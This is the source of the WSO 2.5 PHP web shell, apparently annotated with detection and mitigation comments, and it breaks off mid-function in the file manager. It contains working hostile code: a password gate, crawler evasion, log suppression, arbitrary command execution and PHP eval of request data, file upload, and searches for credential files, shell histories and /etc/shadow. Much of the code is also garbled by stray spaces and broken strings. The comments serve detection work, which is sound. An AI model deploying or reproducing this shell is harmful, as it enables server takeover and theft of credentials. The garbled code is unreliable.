1<?php ?> < ? php
// Operator credential, stored as an md5 hex digest: the login form's 'pass' field is
// md5()-hashed and compared against this literal further down. Because the digest is a
// fixed string embedded in the file, it doubles as a file-content indicator for this
// specific sample.
2$auth_pass = "a23943a5edc56f796ea1aeeb57f78dd4";
// UI accent colour interpolated into the inline CSS of wsoHeader().
3$color = "#df5";
// Handler used when the request does not name one ('FilesMan' is the file-manager view).
4$default_action = 'FilesMan';
// Initial value of the per-host 'ajax' cookie (see the $_COOKIE setup after the auth gate).
5$default_use_ajax = true;
// Page charset offered first in wsoHeader()'s charset selector.
6$default_charset = 'Windows-1251';
// Crawler evasion: a User-Agent matching any of these search-engine bot names gets a bare
// 404 and the script exits, so the page is not indexed. For defenders the list itself is a
// stable content signature, and a 404 observed by a crawler must not be read as "file gone".
7if (!empty($_SERVER['HTTP_USER_AGENT'])) {
 8 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
 9 if (preg_match('/'.implode('|', $userAgents).
 10 '/i', $_SERVER['HTTP_USER_AGENT'])) {
 11 header('HTTP/1.0 404 Not Found');
 12 exit;
 13 }
14}
// Anti-logging / anti-timeout setup. Error logging is switched off and the execution-time
// limit removed; every call is '@'-suppressed so a disabled ini_set()/set_time_limit()
// leaves no trace. A runtime hook on ini_set('log_errors', 0) or ini_set('error_log', NULL)
// from web-served scripts is one practical detection point.
15@ini_set('error_log', NULL);
16@ini_set('log_errors', 0);
17@ini_set('max_execution_time', 0);
18@set_time_limit(0);
// NOTE(review): set_magic_quotes_runtime() no longer exists in PHP 7+; there the call
// raises an Error that '@' does not suppress, so this file as written presumably only runs
// on legacy PHP 5 — confirm against the target's PHP version before assuming it executed.
19@set_magic_quotes_runtime(0);
20@define('WSO_VERSION', '2.5');
// Legacy magic_quotes handling: recursively strips slashes from POST and COOKIE so that
// request data reaches the handlers below unmodified.
21if (get_magic_quotes_gpc()) {
 22 function WSOstripslashes($array) {
 23 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
 24 }
 25 $_POST = WSOstripslashes($_POST);
 26 $_COOKIE = WSOstripslashes($_COOKIE);
27}
28
// Emits the unbranded password prompt and terminates the request. The only observable
// features of this page are a POST form with a single password input named 'pass' and a
// submit button labelled '>>'; that shape is what a proxy or WAF log would show.
29function wsoLogin() {
 30 die("<pre align=center><form method=post> <input type=password name=pass><input type=submit value='>>'></form></pre>");
31}
32
// Sets a response cookie and mirrors it into $_COOKIE so the same request already sees the
// new value. Used by the auth gate (cookie name md5($_SERVER['HTTP_HOST'])) and by the
// handlers to persist the 'ajax', 'act', 'f' and 'c' state between requests.
// No expiry, path or HttpOnly flags are given, so the browser defaults apply.
33function WSOsetcookie($k, $v) {
 34 $_COOKIE[$k] = $v;
 35 setcookie($k, $v);
36}
// Access gate. A POST 'pass' whose md5 equals $auth_pass sets a cookie whose NAME is the
// md5 of the Host header and whose VALUE is $auth_pass itself; every later request is
// admitted on that cookie alone, otherwise wsoLogin() is shown. Both comparisons are loose
// (== and !=). Detection hint grounded in this code: a request cookie named by a 32-hex
// digest of the Host header, carrying another 32-hex digest as its value.
37if (!empty($auth_pass)) {
 38 if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
 39 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin();
40}
// Environment probe. $os selects the Windows or Unix alias table used later; safe_mode and
// disable_functions are read so handlers can adapt to hardening. error_reporting(0) hides
// diagnostics whenever safe_mode is off.
41if (strtolower(substr(PHP_OS, 0, 3)) == "win") $os = 'win';
42else $os = 'nix';
43$safe_mode = @ini_get('safe_mode');
44if (!$safe_mode) error_reporting(0);
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
// The POST field 'c' is a request-chosen working directory: the process chdir()s into it
// before any handler runs, so relative paths elsewhere in the file resolve against it.
// $home_cwd keeps the directory the script was started from.
47if (isset($_POST['c'])) @chdir($_POST['c']);
48$cwd = @getcwd();
49if ($os == 'win') {
50 $home_cwd = str_replace("\", " / ", $home_cwd);
51 $cwd = str_replace("\", " / ", $cwd);
52 }
53 if ($cwd[strlen($cwd) - 1] != '/')
54 $cwd. = '/';
55
56 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']).
57 'ajax']))
58 $_COOKIE[md5($_SERVER['HTTP_HOST']).
59 'ajax'] = (bool) $default_use_ajax;
60
61 if ($os == 'win')
62 $aliases = array(
63 "ListDirectory" => "dir",
64 "Findindex . phpincurrentdir" => "dir / s / w / bindex . php",
65 "Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php",
66 "Showactiveconnections" => "netstat - an",
67 "Showrunningservices" => "netstart",
68 "Useraccounts" => "netuser",
69 "Showcomputers" => "netview",
70 "ARPTable" => "arp - a",
71 "IPConfiguration" => "ipconfig / all"
72 );
73 else
74 $aliases = array(
75 "Listdir" => "ls - lha",
76 "listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va",
77 "showopenedports" => "netstat - an | grep - ilisten",
78 "processstatus" => "psaux",
79 "Find" => "",
80 "findallsuidfiles" => "find / -typef - perm - 04000 - ls",
81 "findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls",
82 "findallsgidfiles" => "find / -typef - perm - 02000 - ls",
83 "findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls",
84 "findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php",
85 "findconfig * files" => "find / -typef - name\"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" 
=> "locate dump", "locate priv files" => "locate priv");
86
87 function wsoHeader() {
88 if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
89 global $color;
90 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=".$_POST['charset'].
91 "'><title>".$_SERVER['HTTP_HOST'].
92 " - WSO ".WSO_VERSION.
93 "</title> < style >
94 body {
95 background - color: #444;color:# e1e1e1;
96 }
97 body, td, th {
98 font: 9 pt Lucida,
99 Verdana;margin: 0;vertical - align: top;color: #e1e1e1;
100 }
101 table.info {
102 color: #fff;background - color: #222; }
103span,h1,a{ color: $color !important; }
104span{ font-weight: bolder; }
105h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:# 222;margin: 0 px;
106 }
107 div.content {
108 padding: 5 px;margin - left: 5 px;background - color: #333; }
109a{ text-decoration:none; }
110a:hover{ text-decoration:underline; }
111.ml1{ border:1px solid # 444;padding: 5 px;margin: 0;overflow: auto;
112 }
113 .bigarea {
114 width: 100 % ;height: 300 px;
115 }
116 input, textarea, select {
117 margin: 0;color: #fff;background - color: #555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
118form{ margin:0px; }
119# toolsTbl {
120 text - align: center;
121 }
122 .toolsInp {
123 width: 300 px
124 }
125 .main th {
126 text - align: left;
127 background - color: #5e5e5e;}
128.main tr:hover{background-color:# 5e5 e5e
129 }
130 .l1 {
131 background - color: #444}
132.l2{background-color:# 333
133 }
134 pre {
135 font - family: Courier, Monospace;
136 } < /style> < script >
137 var c_ = '" . htmlspecialchars($GLOBALS['
138 cwd ']) . "';
139 var a_ = '" . htmlspecialchars(@$_POST['
140 a ']) . "'
141 var charset_ = '" . htmlspecialchars(@$_POST['
142 charset ']) . "';
143 var p1_ = '" . ((strpos(@$_POST['
144 p1 '], "
145 ") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "
146 ';
147 var p2_ = '" . ((strpos(@$_POST['
148 p2 '], "
149 ") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "
150 ';
151 var p3_ = '" . ((strpos(@$_POST['
152 p3 '], "
153 ") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "
154 ';
155 var d = document;
156
157 functionset(a, c, p1, p2, p3, charset) {
158 if (a != null) d.mf.a.value = a;
159 else d.mf.a.value = a_;
160 if (c != null) d.mf.c.value = c;
161 else d.mf.c.value = c_;
162 if (p1 != null) d.mf.p1.value = p1;
163 else d.mf.p1.value = p1_;
164 if (p2 != null) d.mf.p2.value = p2;
165 else d.mf.p2.value = p2_;
166 if (p3 != null) d.mf.p3.value = p3;
167 else d.mf.p3.value = p3_;
168 if (charset != null) d.mf.charset.value = charset;
169 else d.mf.charset.value = charset_;
170 }
171
172 function g(a, c, p1, p2, p3, charset) {
173 set(a, c, p1, p2, p3, charset);
174 d.mf.submit();
175 }
176
177 function a(a, c, p1, p2, p3, charset) {
178 set(a, c, p1, p2, p3, charset);
179 var params = 'ajax=true';
180 for (i = 0; i < d.mf.elements.length; i++)
181 params += '&' + d.mf.elements[i].name + '=' + encodeURIComponent(d.mf.elements[i].value);
182 sr('" . addslashes($_SERVER['
183 REQUEST_URI ']) . "', params);
184 }
185
186 function sr(url, params) {
187 if (window.XMLHttpRequest)
188 req = new XMLHttpRequest();
189 else if (window.ActiveXObject)
190 req = new ActiveXObject('Microsoft.XMLHTTP');
191 if (req) {
192 req.onreadystatechange = processReqChange;
193 req.open('POST', url, true);
194 req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
195 req.send(params);
196 }
197 }
198
199 function processReqChange() {
200 if ((req.readyState == 4))
201 if (req.status == 200) {
202 var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
203 var arr = reg.exec(req.responseText); eval(arr[2].substr(0, arr[1]));
204 } else alert('Request error!');
205 } < /script> < head > < body > < div style = 'position:absolute;width:100%;background-color:#444;top:0;left:0;' >
206 < form method = post name = mf style = 'display:none;' >
207 < input type = hidden name = a >
208 < input type = hidden name = c >
209 < input type = hidden name = p1 >
210 < input type = hidden name = p2 >
211 < input type = hidden name = p3 >
212 < input type = hidden name = charset >
213 < /form>";
214 $freeSpace = @diskfreespace($GLOBALS['cwd']);
215 $totalSpace = @disk_total_space($GLOBALS['cwd']);
216 $totalSpace = $totalSpace ? $totalSpace : 1;
217 $release = @php_uname('r');
218 $kernel = @php_uname('s');
219 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
220 if (strpos('Linux', $kernel) !== false) $explink. = urlencode('Linux Kernel '.substr($release, 0, 6));
221 else $explink. = urlencode($kernel.
222 ' '.substr($release, 0, 3));
223 if (!function_exists('posix_getegid')) {
224 $user = @get_current_user();
225 $uid = @getmyuid();
226 $gid = @getmygid();
227 $group = "?";
228 } else {
229 $uid = @posix_getpwuid(posix_geteuid());
230 $gid = @posix_getgrgid(posix_getegid());
231 $user = $uid['name'];
232 $uid = $uid['uid'];
233 $group = $gid['name'];
234 $gid = $gid['gid'];
235 }
236 $cwd_links = '';
237 $path = explode("/", $GLOBALS['cwd']);
238 $n = count($path);
239 for ($i = 0; $i < $n - 1; $i++) {
240 $cwd_links. = "<a href='#' onclick='g(\"FilesMan\",\"";
241 for ($j = 0; $j <= $i; $j++) $cwd_links. = $path[$j].
242 '/';
243 $cwd_links. = "\")'>".$path[$i].
244 "/</a>";
245 }
246 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
247 $opt_charsets = '';
248 foreach($charsets as $item) $opt_charsets. = '<option value="'.$item.
249 '" '.($_POST['charset'] == $item ? 'selected' : '').
250 '>'.$item.
251 '</option>';
252 $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
253 if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
254 $m['Self remove'] = 'SelfRemove';
255 $menu = '';
256 foreach($m as $k => $v) $menu. = '<th width="'.(int)(100 / count($m)).
257 '%">[ <a href="#" onclick="g(\''.$v.
258 '\',null,\'\',\'\',\'\')">'.$k.
259 '</a> ]</th>';
260 $drives = "";
261 if ($GLOBALS['os'] == 'win') {
262 foreach(range('c', 'z') as $drive) if (is_dir($drive.
263 ':\'))
264 $drives. = ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.
265 ':/\')" > ['.$drive.
266 '] < / a > ';
267 }
268 echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
269 ' . ($GLOBALS['
270 os '] == '
271 win '?' < br > Drives:
272 ':'
273 ') . ' < / span > < /
274 td > '
275 .
276 ' < td > < nobr > '.substr(@php_uname(), 0, 120).
277 ' < ahref = "'.$explink.
278 '"target = _blank > [exploit - db . com] < / a > < / nobr > < br > '.$uid.
279 '('.$user.
280 ') < span > Group: < / span > '.$gid.
281 '('.$group.
282 ') < br > '.@phpversion().
283 ' < span > Safemode: < / span > '.($GLOBALS['safe_mode'] ? ' < fontcolor = red > ON < / font > ' : ' < fontcolor = green > < b > OFF < / b > < / font > ')
284 .
285 ' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').
286 '<br>'.wsoViewSize($totalSpace).
287 ' <span>Free:</span> '.wsoViewSize($freeSpace).
288 ' ('.(int)($freeSpace / $totalSpace * 100).
289 '%)<br>'.$cwd_links.
290 ' '.wsoPermsColor($GLOBALS['cwd']).
291 ' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].
292 '\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.
293 '</td>'
294 .
295 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.
296 '</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].
297 '<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].
298 '</nobr></td></tr></table>'.
299 '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.
300 '</tr></table><div style="margin:5">';
301 }
302
303 function wsoFooter() {
304 $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
305 echo " < /div> < table class = info id = toolsTbl cellpadding = 3 cellspacing = 0 width = 100 % style = 'border-top:2px solid #333;border-bottom:2px solid #333;' >
306 < tr >
307 < td > < form onsubmit = 'g(null,this.c.value,\"\");return false;' > < span > Change dir: < /span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form > < /td> < td > < form onsubmit = \"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> < /tr><tr> < td > < form onsubmit = \"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> < td > < form onsubmit = \"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> < /tr><tr> < td > < form onsubmit = \"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> < td > < form method = 'post'
308 ENCTYPE = 'multipart/form-data' >
309 < input type = hidden name = a value = 'FilesMAn' >
310 < input type = hidden name = c value = '" . $GLOBALS['
311 cwd '] . "' >
312 < input type = hidden name = p1 value = 'uploadFile' >
313 < input type = hidden name = charset value = '" . (isset($_POST['
314 charset ']) ? $_POST['
315 charset '] : '
316 ') . "' >
317 < span > Upload file: < /span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form > < br > < /td> < /tr></table > < /div></body > < /html>";
318 }
// Fallback stubs for hosts without the posix extension, so later @posix_getpwuid() /
// @posix_getgrgid() calls return false instead of failing. The strpos() guard skips the
// definition when the name appears in disable_functions — presumably to avoid a redeclare
// error in that configuration (not verifiable from this file alone).
319 if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
 320 function posix_getpwuid($p) {
 321 return false;
 322 }
 323 }
324 if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
 325 function posix_getgrgid($p) {
 326 return false;
 327 }
 328 }
329
// Command-execution primitive. Tries exec(), passthru(), system(), shell_exec() and
// popen() in that order; the first one that exists runs $in unmodified and its output is
// returned as a single string. Callers in this file pass fixed strings ('df -h', 'ver',
// 'net user', 'which <name>') and, in the tar branch of actionFilesMan, request-derived
// data. Every call is '@'-suppressed, so failures never reach the error log.
// Mitigation grounded in this code: with all five names listed in php.ini
// disable_functions, no branch is taken and the function returns '' (the initial value).
330 function wsoEx($in) {
 331 $out = '';
 332 if (function_exists('exec')) {
 333 @exec($in, $out);
 334 $out = @join("
 335 ", $out);
 336 }
 337 elseif(function_exists('passthru')) {
 338 ob_start();
 339 @passthru($in);
 340 $out = ob_get_clean();
 341 }
 342 elseif(function_exists('system')) {
 343 ob_start();
 344 @system($in);
 345 $out = ob_get_clean();
 346 }
 347 elseif(function_exists('shell_exec')) {
 348 $out = shell_exec($in);
 349 }
 350 elseif(is_resource($f = @popen($in, "r"))) {
 351 $out = "";
 352 while (!@feof($f)) $out. = fread($f, 1024);
 353 pclose($f);
 354 }
 355 return $out;
 356 }
357
// Formats a byte count as a human-readable size with two decimals (GB / MB / KB / B).
// Integers are first passed through sprintf('%u') so negative values from 32-bit
// overflow print as their unsigned form; the comparisons then operate on that string.
358 function wsoViewSize($s) {
 359 if (is_int($s)) $s = sprintf("%u", $s);
 360 if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824).
 361 ' GB';
 362 elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576).
 363 ' MB';
 364 elseif($s >= 1024) return sprintf('%1.2f', $s / 1024).
 365 ' KB';
 366 else return $s.
 367 ' B';
 368 }
369
// Renders a fileperms() mode word as an ls-style string: one file-type character
// (socket, symlink, regular, block, directory, character, fifo, or 'u' when none matches)
// followed by the owner/group/other rwx triads, with setuid/setgid (0x0800 / 0x0400)
// shown as s/S and the sticky bit (0x0200) as t/T in the execute position.
370 function wsoPerms($p) {
 371 if (($p & 0xC000) == 0xC000) $i = 's';
 372 elseif(($p & 0xA000) == 0xA000) $i = 'l';
 373 elseif(($p & 0x8000) == 0x8000) $i = '-';
 374 elseif(($p & 0x6000) == 0x6000) $i = 'b';
 375 elseif(($p & 0x4000) == 0x4000) $i = 'd';
 376 elseif(($p & 0x2000) == 0x2000) $i = 'c';
 377 elseif(($p & 0x1000) == 0x1000) $i = 'p';
 378 else $i = 'u';
 379 $i. = (($p & 0x0100) ? 'r' : '-');
 380 $i. = (($p & 0x0080) ? 'w' : '-');
 381 $i. = (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
 382 $i. = (($p & 0x0020) ? 'r' : '-');
 383 $i. = (($p & 0x0010) ? 'w' : '-');
 384 $i. = (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
 385 $i. = (($p & 0x0004) ? 'r' : '-');
 386 $i. = (($p & 0x0002) ? 'w' : '-');
 387 $i. = (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
 388 return $i;
 389 }
390
// Wraps wsoPerms() output for path $f in a <font> tag coloured by access from the web
// server's effective user: red when unreadable, white when readable but not writable,
// green when writable. fileperms() is '@'-suppressed, so a missing path yields the
// 'u---------' form rather than an error.
391 function wsoPermsColor($f) {
 392 if (!@is_readable($f)) return '<font color=#FF0000>'.wsoPerms(@fileperms($f)).
 393 '</font>';
 394 elseif(!@is_writable($f)) return '<font color=white>'.wsoPerms(@fileperms($f)).
 395 '</font>';
 396 else return '<font color=#25ff00>'.wsoPerms(@fileperms($f)).
 397 '</font>';
 398 }
399
// Lists directory entries, preferring scandir() and falling back to opendir()/readdir().
// In the fallback path neither the opendir() result nor an empty directory is checked:
// $files is never initialised if no entry is read, and the handle is not closed.
400 function wsoScandir($dir) {
 401 if (function_exists("scandir")) {
 402 return scandir($dir);
 403 } else {
 404 $dh = opendir($dir);
 405 while (false !== ($filename = readdir($dh))) $files[] = $filename;
 406 return $files;
 407 }
 408 }
409
// Resolves a binary name through the shell ('which ' . $p via wsoEx()) and returns the
// path text, or false when nothing was printed. In this file it is only called from
// actionSecInfo with fixed tool names, which is why $p is concatenated without quoting.
410 function wsoWhich($p) {
 411 $path = wsoEx('which '.$p);
 412 if (!empty($path)) return $path;
 413 return false;
 414 }
415
416 function actionSecInfo() {
417 wsoHeader();
418 echo '<h1>Server security information</h1><div class=content>';
419
420 function wsoSecParam($n, $v) {
421 $v = trim($v);
422 if ($v) {
423 echo '<span>'.$n.
424 ': </span>';
425 if (strpos($v, "
426 ") === false) echo $v . '<br>';
427 else echo '<pre class=ml1>'.$v.
428 '</pre>';
429 }
430 }
431 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
432 if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
433 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
434 wsoSecParam('Open base dir', @ini_get('open_basedir'));
435 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
436 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
437 wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
438 $temp = array();
439 if (function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().
440 ")";
441 if (function_exists('mssql_connect')) $temp[] = "MSSQL";
442 if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
443 if (function_exists('oci_connect')) $temp[] = "Oracle";
444 wsoSecParam('Supported databases', implode(', ', $temp));
445 echo '<br>';
446 if ($GLOBALS['os'] == 'nix') {
447 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
448 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
449 wsoSecParam('OS version', @file_get_contents('/proc/version'));
450 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
451 if (!$GLOBALS['safe_mode']) {
452 $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
453 $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
454 $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
455 echo '<br>';
456 $temp = array();
457 foreach($userful as $item) if (wsoWhich($item)) $temp[] = $item;
458 wsoSecParam('Userful', implode(', ', $temp));
459 $temp = array();
460 foreach($danger as $item) if (wsoWhich($item)) $temp[] = $item;
461 wsoSecParam('Danger', implode(', ', $temp));
462 $temp = array();
463 foreach($downloaders as $item) if (wsoWhich($item)) $temp[] = $item;
464 wsoSecParam('Downloaders', implode(', ', $temp));
465 echo '<br/>';
466 wsoSecParam('HDD space', wsoEx('df -h'));
467 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
468 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
469 if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
470 $temp = "";
471 for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
472 $uid = @posix_getpwuid($_POST['p2']);
473 if ($uid) $temp. = join(':', $uid).
474 "
475 ";
476 }
477 echo '<br/>';
478 wsoSecParam('Users', $temp);
479 }
480 }
481 } else {
482 wsoSecParam('OS Version', wsoEx('ver'));
483 wsoSecParam('Account Settings', wsoEx('net accounts'));
484 wsoSecParam('User Accounts', wsoEx('net user'));
485 }
486 echo '</div>';
487 wsoFooter();
488 }
489
490 function actionPhp() {
// Arbitrary-PHP handler: the POST field 'p1' is passed to eval() in two places below,
// with output captured by ob_start()/ob_get_clean(). Presumably reached through the 'a'
// form field (the menu in wsoHeader() calls g('Php', ...), which fills d.mf.a) — the
// dispatcher itself is outside this chunk, so confirm there. For detection, POST bodies
// carrying both an 'a' value and a 'p1' payload to this file are the request-level
// signature; the eval-of-request-data pattern is also what static PHP scanners key on.
 491 if (isset($_POST['ajax'])) {
 492 WSOsetcookie(md5($_SERVER['HTTP_HOST']).
 493 'ajax', true);
 494 ob_start();
// AJAX branch: p1 is evaluated server-side and the captured output is returned as a
// length-prefixed JavaScript snippet, which the page's processReqChange() in turn hands
// to the browser's eval(); the response is therefore JS, not HTML.
 495 eval($_POST['p1']);
 496 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()), "
 497
 498 \
 499 ' ") . "';
 500 ";
 501 echo strlen($temp), "
 502 ", $temp;
 503 exit;
 504 }
 505 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).
 506 'ajax', 0);
 507 wsoHeader();
// p2 == 'info' renders phpinfo() inline, with its <body>/<td> CSS and <img> tags stripped
// and <h1> demoted to <h2> so it fits the page layout.
 508 if (isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
 509 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
 510 ob_start();
 511 phpinfo();
 512 $tmp = ob_get_clean();
 513 $tmp = preg_replace(array('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU', ), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
 514 echo str_replace('<h1', '<h2', $tmp).
 515 '</div><br>';
 516 }
 517 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '').
 518 '</textarea><input type=submit value=Eval style="margin-top:5px">';
 519 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).
 520 'ajax'] ? 'checked' : '').
 521 '> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1']) ? 'display:none;' : '').
 522 'margin-top:5px;" class=ml1>';
// Non-AJAX branch: same eval of p1, output HTML-escaped into the <pre id=PhpOutput>.
 523 if (!empty($_POST['p1'])) {
 524 ob_start();
 525 eval($_POST['p1']);
 526 echo htmlspecialchars(ob_get_clean());
 527 }
 528 echo '</pre></div>';
 529 wsoFooter();
 530 }
531
532 function actionFilesMan() {
533 if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
534 if (!empty($_POST['p1'])) {
535 switch ($_POST['p1']) {
536 case 'uploadFile':
537 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
538 break;
539 case 'mkdir':
540 if (!@mkdir($_POST['p2'])) echo "Can't create new dir";
541 break;
542 case 'delete':
543 function deleteDir($path) {
544 $path = (substr($path, -1) == '/') ? $path : $path.
545 '/';
546 $dh = opendir($path);
547 while (($item = readdir($dh)) !== false) {
548 $item = $path.$item;
549 if ((basename($item) == "..") || (basename($item) == ".")) continue;
550 $type = filetype($item);
